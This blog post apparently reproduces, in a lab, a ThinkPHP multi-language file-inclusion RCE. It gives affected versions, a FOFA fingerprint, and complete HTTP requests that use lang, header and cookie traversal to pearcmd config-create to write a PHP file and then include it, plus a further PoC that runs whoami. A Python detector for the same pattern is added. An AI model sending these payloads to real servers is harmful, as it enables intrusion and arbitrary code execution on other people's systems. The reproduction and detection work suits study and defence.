Preface
If a ThinkPHP application has the multi-language feature enabled, a parameter supplied via GET, a header, a cookie, and so on can be used for directory traversal plus file inclusion; combined with the pearcmd file-inclusion trick, this gives RCE.
Affected versions
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x
FOFA fingerprint
header="think_lang"
Vulnerability reproduction
Enabling multi-language in the different versions
- thinkphp6
Just uncomment the multi-language loading line in the file app/middleware.php :
<?php
// Global middleware definition file
return [
    // Global request cache
    // \think\middleware\CheckRequestCache::class,
    // Multi-language loading
    \think\middleware\LoadLangPack::class,
    // Session initialisation
    // \think\middleware\SessionInit::class
];
- thinkphp5
The version used for testing was 5.0.23, so only application/config.php was modified; the relevant file is one of:
config/app.php
application/config.php
and the setting to enable is:
'lang_switch_on' => true
Background knowledge
PS: in case some readers skip the referenced article, the key points are copied directly from P牛's article.
pecl is the command-line tool in PHP for managing extensions, and pear is the library that pecl depends on. In PHP 7.3 and earlier, pecl/pear are installed by default; in 7.4 and later, --with-pear must be specified when compiling PHP for them to be installed.
However, in Docker images of any version, pecl/pear are installed by default, at the path /usr/local/lib/php.
This file provides a command named config-create, which can create a file. The command takes two parameters: the second is the path of the file to write, and the first is the content written into that file.
Setting up the reproduction environment
- Method 1 (the easy way)
docker pull vulfocus/thinkphp:6.0.12
- Method 2 (the cumbersome way, and the one I used at first)
1. git clone https://github.com/top-think/think.git think_git
2. Edit composer.json to install v6.0.12 :
    "require": {
        "php": ">=7.2.5",
        "topthink/framework": "6.0.12",
        "topthink/think-orm": "^2.0"
    },
3. composer install
4. Then enable the multi-language feature
5. Start it with docker compose :
version: "3.3" # optional since v1.27.0
services:
  web:
    image: php:7.4-apache
    ports:
      - "8888:80"
    volumes:
      - /var/www/think_git:/var/www/html
Writing a file via a GET parameter and including it
- Use the request from P牛's article directly; adjust the file name to the actual situation, and if the file does not get written, try adding more ../
GET /public/index.php?lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/1.php HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- File inclusion
GET /think/public/index.php?lang=../../../../../../../../../../../../tmp/1 HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Writing a file via a header and including it
In config/lang.php you can see that the variable names used for the header and the cookie are think-lang and think_lang respectively; try reproducing with them:
// Multi-language cookie variable
'cookie_var' => 'think_lang',
// Multi-language header variable
'header_var' => 'think-lang',
Reproduction requests
- Create the file
GET /think/public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/2.php HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
think-lang:../../../../../../../../../../../../../../usr/local/lib/php/pearcmd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- File inclusion
GET /think/public/index.php?lang=../../../../../../../../../../../../tmp/2 HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Writing a file via a cookie and including it
- Write the file
GET /think/public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/3.php HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:think_lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd
Connection: close
- File inclusion
GET /think/public/index.php?lang=../../../../../../../../../../../../tmp/3 HTTP/1.1
Host: 192.168.59.151:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
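From the defender's side, all three reproduction paths above share one signature: the language value (lang query parameter, think-lang header, or think_lang cookie, the names from config/lang.php) carries a path with ../ instead of a locale tag, and the write stage carries pearcmd / config-create in the query string. The following is an added example, not code from the post or from ThinkPHP, that parses raw requests and flags that pattern. The sample requests are constructed after the ones shown above, and the regex defining a "normal" locale tag is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

# Added example (not from the post): flag requests that feed a path instead
# of a locale into ThinkPHP's language switch. The three sources are the ones
# the post lists from config/lang.php: the lang query parameter, the
# think-lang header and the think_lang cookie.
QUERY_VAR = "lang"
HEADER_VAR = "think-lang"
COOKIE_VAR = "think_lang"

# Assumption: a legitimate language value is a short locale tag such as
# "zh-cn", "en" or "en_US"; anything else is worth a look.
SAFE_LANG = re.compile(r"^[A-Za-z]{2,3}(?:[-_][A-Za-z]{2,8})?$")

# Tokens the post's write-file stage needs in the query string.
PEAR_INDICATORS = ("pearcmd", "config-create")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, query string and headers."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.splitlines() if line.strip()]
    method, target = lines[0].split()[:2]
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # tolerates "Cookie:x=y" without a space
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers}


def lang_values(req: dict) -> list:
    """Collect (source, value) for every place the language can be supplied."""
    found = []
    for key, value in parse_qsl(req["query"], keep_blank_values=True):
        if key == QUERY_VAR:
            found.append(("query", value))
    headers = req["headers"]
    if HEADER_VAR in headers:
        found.append(("header", unquote(headers[HEADER_VAR])))
    for piece in headers.get("cookie", "").split(";"):
        name, _, value = piece.strip().partition("=")
        if name == COOKIE_VAR:
            found.append(("cookie", unquote(value)))
    return found


def assess(raw: str) -> dict:
    """Return the findings for one raw request; an empty list means it looks benign."""
    req = parse_request(raw)
    findings = []
    for source, value in lang_values(req):
        if ".." in value or "/" in value or "\\" in value:
            findings.append(f"{source}: path traversal in language value {value!r}")
        elif not SAFE_LANG.match(value):
            findings.append(f"{source}: language value {value!r} is not a locale tag")
    query = unquote(req["query"]).lower()
    hits = [token for token in PEAR_INDICATORS if token in query]
    if hits:
        findings.append("query: pearcmd indicators " + ", ".join(hits))
    return {"path": req["path"], "findings": findings, "suspicious": bool(findings)}


# Constructed sample requests, modelled on the ones in the post (not real traffic).
BENIGN = "GET /index.php?lang=zh-cn HTTP/1.1\nHost: app.example\nCookie: think_lang=en\nthink-lang: en_US\n"
VIA_QUERY = ("GET /public/index.php?lang=../../../../usr/local/lib/php/pearcmd"
             "&+config-create+/&/<?=phpinfo()?>+/tmp/1.php HTTP/1.1\nHost: app.example\n")
VIA_HEADER = ("GET /public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/2.php HTTP/1.1\n"
              "Host: app.example\nthink-lang:../../../../usr/local/lib/php/pearcmd\n")
VIA_COOKIE = ("GET /public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/3.php HTTP/1.1\n"
              "Host: app.example\nCookie:think_lang=../../../../usr/local/lib/php/pearcmd\n")
INCLUDE_STAGE = "GET /public/index.php?lang=../../../../tmp/1 HTTP/1.1\nHost: app.example\n"

if __name__ == "__main__":
    for name, raw in [("benign", BENIGN), ("query", VIA_QUERY), ("header", VIA_HEADER),
                      ("cookie", VIA_COOKIE), ("include", INCLUDE_STAGE)]:
        result = assess(raw)
        print(name, "SUSPICIOUS" if result["suspicious"] else "ok")
        for finding in result["findings"]:
            print("   ", finding)
```

The check is deliberately applied to all three sources at once, because a WAF rule that only inspects the query string misses the header and cookie variants shown above; the inclusion stage (a bare lang=../../tmp/1 with no pearcmd tokens) is still caught by the traversal test alone.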
I also saw another PoC online, but unfortunately could not reproduce it; if any fellow researcher has succeeded, please share.
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami
All articles on this blog are original unless otherwise noted. Author: 小陈. When copying or reposting, please credit 小陈's Blog (focused on hacking techniques, penetration testing and network information security) with a hyperlink.
Original article: “Thinkphp lang RCE reproduction”